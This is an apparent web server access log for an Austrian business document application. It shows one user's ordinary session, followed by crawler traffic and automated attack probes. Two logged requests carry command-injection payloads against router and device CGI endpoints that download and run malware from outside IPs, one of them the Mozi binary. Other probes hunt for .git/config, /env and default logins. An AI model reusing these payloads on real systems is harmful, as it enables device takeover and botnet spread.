77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /entry.php?id=11239&mode=document&form=10668& HTTP/1.1" 200 2023 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1391 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745946169 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /gui/javascript/form_form.js?1745946169 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /gui/javascript/form_form.js?1745946169 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /framework/icons/treeview/ftv2doc.gif HTTP/1.1" 200 199 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /entry.php?id=11238&mode=document&form=10668& HTTP/1.1" 200 3239 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /gui/images/icons/kalender.gif HTTP/1.1" 200 564 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:49 +0200] "GET /entry.php?id=11240&mode=document&form=10668& HTTP/1.1" 200 2672 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745946170 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /gui/javascript/form_form.js?1745946170 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2588 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1515 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /framework/icons/fwx_trans.gif HTTP/1.1" 200 43 "http://hausegger.activities.at/entry.php?id=10778&form=11066&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /framework/icons/sortUp.gif HTTP/1.1" 200 53 "http://hausegger.activities.at/entry.php?id=10776&form=11066&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "POST /entry.php?id=11240 HTTP/1.1" 200 2673 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2574 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:02:50 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1515 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:05:58 +0200] "GET /entry.php?id=10831 HTTP/1.1" 200 8824 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:05:58 +0200] "GET /gui/javascript/form_form.js?1745946358 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:05:58 +0200] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:00 +0200] "GET /entry.php?id=11237&type=10668 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10831" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:00 +0200] "GET /entry.php?id=11238&mode=document&form=10668& HTTP/1.1" 200 3238 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:00 +0200] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1391 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:01 +0200] "GET /gui/javascript/form_bu_document_workflow.js?1745946361 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:01 +0200] "GET /gui/javascript/form_form.js?1745946361 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:01 +0200] "GET /gui/javascript/form_form.js?1745946361 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:00 +0200] "GET /entry.php?id=11239&mode=document&form=10668& HTTP/1.1" 200 2022 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:00 +0200] "GET /entry.php?id=11240&mode=document&form=10668& HTTP/1.1" 200 2672 "http://hausegger.activities.at/entry.php?id=11237&type=10668" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:01 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1515 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:01 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2588 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:01 +0200] "POST /entry.php?id=11240 HTTP/1.1" 200 2672 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10668&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:02 +0200] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2574 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:02 +0200] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1515 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:04 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1878 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:04 +0200] "GET /gui/javascript/form_form.js?1745946364 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:05 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:05 +0200] "GET /gui/javascript/form_form.js?1745946365 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:05 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1912 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [29/Apr/2025:19:06:05 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
207.46.13.54 - - [29/Apr/2025:19:08:02 +0200] "GET /sitemap.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
195.191.219.132 - - [29/Apr/2025:19:14:36 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
195.191.219.132 - - [29/Apr/2025:19:14:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.0; http://mj12bot.com/)"
194.165.16.167 - - [29/Apr/2025:19:15:48 +0200] "\x03" 400 383 "-" "-"
122.97.214.211 - - [29/Apr/2025:19:26:35 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 378 "-" "-"
154.81.156.54 - - [29/Apr/2025:19:40:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.225 - - [29/Apr/2025:19:56:32 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.81.156.7 - - [29/Apr/2025:20:08:11 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.35 - - [29/Apr/2025:20:13:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
40.77.167.85 - - [29/Apr/2025:20:14:10 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.102 - - [29/Apr/2025:20:14:16 +0200] "GET /sitemap.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
154.81.156.54 - - [29/Apr/2025:20:16:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [29/Apr/2025:20:27:25 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
185.242.226.116 - - [29/Apr/2025:20:28:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [29/Apr/2025:20:29:35 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Python/3.7 aiohttp/3.8.1"
47.79.212.5 - - [29/Apr/2025:20:51:45 +0200] "GET /wp-content/uploads/grup6-300x169.jpg HTTP/1.0" 404 315 "-" "Mozilla/5.0 (iPad; CPU OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/122.0.6261.89 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [29/Apr/2025:20:53:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.242.171.104 - - [29/Apr/2025:21:01:45 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello-World/1.0"
185.218.86.4 - - [29/Apr/2025:21:15:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.7 - - [29/Apr/2025:21:27:29 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
183.182.125.198 - - [29/Apr/2025:21:28:09 +0200] "POST /wp-login.php HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
183.182.125.198 - - [29/Apr/2025:21:28:09 +0200] "POST /wordpress/wp-login.php HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
154.81.156.54 - - [29/Apr/2025:21:35:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.100.11.243 - - [29/Apr/2025:21:52:36 +0200] "GET / HTTP/1.1" 200 274 "-" "'Mozilla/5.0"
154.81.156.54 - - [29/Apr/2025:21:59:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
13.86.107.210 - - [29/Apr/2025:22:08:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
5.190.225.124 - - [29/Apr/2025:22:13:25 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
102.212.40.123 - - [29/Apr/2025:22:15:46 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.22.160.2:37228/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-"
185.218.84.178 - - [29/Apr/2025:22:32:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [29/Apr/2025:22:34:28 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
154.81.156.35 - - [29/Apr/2025:22:39:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
58.212.123.7 - - [29/Apr/2025:22:41:04 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
58.212.123.7 - - [29/Apr/2025:22:41:12 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/86.0.4240.111Safari/537.36"
154.81.156.54 - - [29/Apr/2025:22:52:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.121.133.117 - - [29/Apr/2025:22:55:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
118.193.61.179 - - [29/Apr/2025:23:09:25 +0200] "\x16\x03\x01\x01\x17\x01" 400 383 "-" "-"
118.193.61.179 - - [29/Apr/2025:23:09:35 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
118.193.61.179 - - [29/Apr/2025:23:09:36 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.193.61.179 - - [29/Apr/2025:23:09:36 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.193.61.179 - - [29/Apr/2025:23:09:37 +0200] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.193.61.179 - - [29/Apr/2025:23:09:38 +0200] "GET /config.json HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
154.81.156.54 - - [29/Apr/2025:23:21:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.159.128.155 - - [29/Apr/2025:23:25:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.174.93.12 - - [29/Apr/2025:23:33:25 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
27.115.124.104 - - [29/Apr/2025:23:33:59 +0200] "\x16\x03\x01\x014\x01" 400 383 "-" "-"
27.115.124.97 - - [29/Apr/2025:23:34:00 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
27.115.124.104 - - [29/Apr/2025:23:34:01 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
27.115.124.40 - - [29/Apr/2025:23:34:02 +0200] "GET /robots.txt HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
27.115.124.96 - - [29/Apr/2025:23:34:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
27.115.124.34 - - [29/Apr/2025:23:34:04 +0200] "GET /config.json HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
195.211.191.76 - - [29/Apr/2025:23:41:05 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36"
27.115.124.49 - - [29/Apr/2025:23:41:36 +0200] "\x16\x03\x01\x014\x01" 400 383 "-" "-"
27.115.124.40 - - [29/Apr/2025:23:41:36 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
27.115.124.49 - - [29/Apr/2025:23:41:37 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
27.115.124.48 - - [29/Apr/2025:23:41:38 +0200] "GET /robots.txt HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
27.115.124.33 - - [29/Apr/2025:23:41:38 +0200] "GET /sitemap.xml HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
27.115.124.5 - - [29/Apr/2025:23:41:39 +0200] "GET /config.json HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
185.242.226.116 - - [29/Apr/2025:23:52:20 +0200] "\x16\x03\x01" 400 383 "-" "-"
57.129.64.237 - - [30/Apr/2025:00:00:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
154.81.156.54 - - [30/Apr/2025:00:01:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [30/Apr/2025:00:03:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.207.223.117 - - [30/Apr/2025:00:04:34 +0200] "POST /login HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
47.79.214.158 - - [30/Apr/2025:00:10:00 +0200] "GET /wp-content/uploads/grup19-300x169.jpg HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
154.81.156.54 - - [30/Apr/2025:00:33:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.95.106 - - [30/Apr/2025:00:37:21 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
93.174.95.106 - - [30/Apr/2025:00:37:21 +0200] "GET /robots.txt HTTP/1.1" 404 355 "-" "-"
93.174.95.106 - - [30/Apr/2025:00:37:22 +0200] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "-"
93.174.95.106 - - [30/Apr/2025:00:37:22 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 369 "-" "-"
93.174.95.106 - - [30/Apr/2025:00:37:22 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
5.183.209.244 - - [30/Apr/2025:01:06:01 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
198.235.24.58 - - [30/Apr/2025:01:11:10 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
18.222.139.219 - - [30/Apr/2025:01:13:37 +0200] "" 400 383 "-" "-"
18.222.139.219 - - [30/Apr/2025:01:13:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
154.81.156.54 - - [30/Apr/2025:01:15:08 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.222.139.219 - - [30/Apr/2025:01:18:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
154.81.156.35 - - [30/Apr/2025:01:25:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.150.207.82 - - [30/Apr/2025:01:26:16 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 297 "-" "Mozilla/5.0 zgrab/0.x"
18.222.139.219 - - [30/Apr/2025:01:27:13 +0200] "\x16\x03\x01" 400 383 "-" "-"
194.50.16.252 - - [30/Apr/2025:01:49:45 +0200] "GET /env HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36"
